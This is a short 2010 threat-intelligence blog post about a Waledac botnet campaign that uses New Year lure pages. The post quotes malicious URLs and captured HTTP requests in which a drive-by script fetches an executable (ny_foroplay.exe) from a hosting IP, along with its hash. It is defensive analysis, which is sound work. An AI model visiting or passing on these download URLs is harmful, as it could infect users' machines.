MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

1.1.10

Waledac returns with another attack strategy

After a long period of inactivity, the botnet consisting waledac again deploy a strategy of infection using the pattern that characterizes it: Social Engineering, that this time advantage as cover the beginning of the new year.

Latest waledac campaigns dating from the middle of the year when propagation strategy used pretended to be a video on Independence Day in the U.S., hosted on YouTube. In fact, the most important activity this year came during the first quarter.

Here we see catches describe waledac timeline about their business during 2009.

However, those who are behind waledac never stopped and have recently used the domain registration date throughout the period of supposed inactivity.

Each page used for the propagation has a script obfuscated with instructions to be executed automatically on the victim machine. Thus, it exploits a weakness and automatically download and execute malware, turning your computer into a node of the botnet to continue with their activities. We then see a screenshot of the script.

Inside the script is the reference to the counter.php file hosting another script and from which it jumps to http://diokxbgrqkgg.com/ld/trest1/ and this http://diokxbgrqkgg.com/nte/trest1. py, where there is another malicious script.

GET /counter.php HTTP/1.1
Host: aju.nonprobs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://aju.nonprobs.com/2010.html

In this instance, download and run a file called "ny_foroplay.exe" (MD5: df2d6f835ad6e5276b1b1ffe73170070) from IP address 95.169.190.208 hosted in Russia.

It's worth noting that this malware has a very low rate of detection, being detected to date antivirus companies only 6 out of 40. Report VT.

GET /pr/pic/ny_foroplay.exe HTTP/1.0
Host: 95.169.190.208

HTTP/1.0 200 OK
Age: 1542
Date: Fri, 01 Jan 2010 19:22:58 GMT
Content-Length: 416256
Content-Type: application/octet-stream
Server: nginx/0.8.15
Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.........y.=u..=u..=u...u..u..

Waledac is back with a new excuse, but judging by the percentage of activity that owns the server where it's housed, it appears that he always remained dormant with very sporadic activities. Even taking into account the folder structure from which to download, seems to have a direct relationship with another threat that is Bredolab well known, and which apparently also associated with some scareware and ZeuS.

Related information
Waledac/Storm. Past and present a threat
Massive campaign to spread/infection Waledac launched by using as excuse the Independence Day of USA
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
More Waledac in action. Can you guess how much you master win?
Waledac more loving than ever
Social Engineering and Waledac Valentine

Jorge Mieres

0 comentarios:

Post a Comment

Subscribe to: Post Comments (Atom)